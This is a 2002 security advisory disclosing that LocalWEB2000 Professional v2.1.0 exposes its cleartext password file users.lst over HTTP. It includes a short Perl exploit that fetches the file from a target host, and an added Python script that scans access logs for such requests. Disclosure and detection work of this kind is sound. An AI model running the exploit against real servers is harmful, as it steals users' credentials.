LocalWEB2000 Professional v2.1.0 Unauthorized Password Disclosure Vulnerability

Type: File Disclosure
Release Date: August 29, 2002

Product / Vendor
LocalWEB2000 is an HTTP server for the Windows family of operating systems. It is available in two versions, Standard and Professional.
http://www.intranet-server.co.uk

Summary
LocalWEB2000 Professional webserver v2.1.0 stores its user passwords insecurely. The file "users.lst" (C:\Program Files\LocalWEB\users.lst) can be opened in any text editor, and the usernames and passwords in it are readable in cleartext. The same file is also served to remote users without any username/password restriction:
http://target/users.lst

Exploit
An exploit for this vulnerability exists and is available below.

==================== SNIP ====================
#!/usr/bin/perl -w
# LocalWEB2000 Professional v2.1.0 Unauthorized Password Disclosure Vulnerability / SecurityOffice
use strict;

die "\nLocalWEB2000 Professional v2.1.0 Unauthorized Password Disclosure Vulnerability / SecurityOffice\n\nUsage: $0 <host>\n" if @ARGV < 1;

get($ARGV[0]);
exit 0;

# Fetch the cleartext password file through the web server with lynx.
sub get {
    my ($host) = @_;
    system "lynx $host/users.lst";
    print "Done\n\n";
}
==================== SNIP ====================

Tested
LocalWEB2000 v2.1.0 / Windows 2000 SP3

Vulnerable
LocalWEB2000 v2.1.0

Disclaimer
http://www.securityoffice.net is not responsible for the misuse or illegal use of any of the information and/or the software listed in this security advisory.

Author
Tamer Sahin
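For administrators who need to know whether the users.lst file described in the Summary has already been pulled from a server, the following is an added example (not part of the advisory or of the LocalWEB2000 product) that scans Common Log Format access-log lines for requests to that file and marks those the server answered with a 200 and a non-empty body. The log lines are constructed for the example; LocalWEB2000's own log format is not documented here, so the parser assumes CLF.

```python
import re
from typing import Dict, List

# Constructed sample access-log lines in Common Log Format; they are not
# taken from the advisory or from a real LocalWEB2000 log.
SAMPLE_LOG = """\
10.0.0.5 - - [29/Aug/2002:10:15:01 +0000] "GET /index.html HTTP/1.0" 200 1043
10.0.0.9 - - [29/Aug/2002:10:15:07 +0000] "GET /users.lst HTTP/1.0" 200 312
10.0.0.9 - - [29/Aug/2002:10:15:08 +0000] "GET /USERS.LST?x=1 HTTP/1.0" 200 312
10.0.0.7 - - [29/Aug/2002:10:16:30 +0000] "GET /docs/../users.lst HTTP/1.0" 404 0
"""

# One CLF record: client, identd, user, [timestamp], "request", status, size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: [^"]*)?" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# File names the web server must never serve; compared case-insensitively
# because the server runs on Windows, where users.lst and USERS.LST are the same file.
SENSITIVE_FILES = {"users.lst"}


def find_password_file_requests(log_text: str) -> List[Dict[str, object]]:
    """Return one record per request for a sensitive file.

    'disclosed' is True when the server answered 200 with a non-empty body,
    i.e. the credential file actually left the host.
    """
    hits: List[Dict[str, object]] = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                                  # skip malformed lines
        path = m.group("path").split("?", 1)[0]       # drop any query string
        name = path.rsplit("/", 1)[-1].lower()        # last path segment only
        if name not in SENSITIVE_FILES:
            continue
        size = m.group("size")
        hits.append({
            "ip": m.group("ip"),
            "timestamp": m.group("ts"),
            "path": path,
            "status": int(m.group("status")),
            "disclosed": m.group("status") == "200" and size not in ("-", "0"),
        })
    return hits
```

Run it over the server's real access log instead of SAMPLE_LOG; every record with "disclosed" set to True is a client that obtained the cleartext credentials, so those passwords should be treated as compromised.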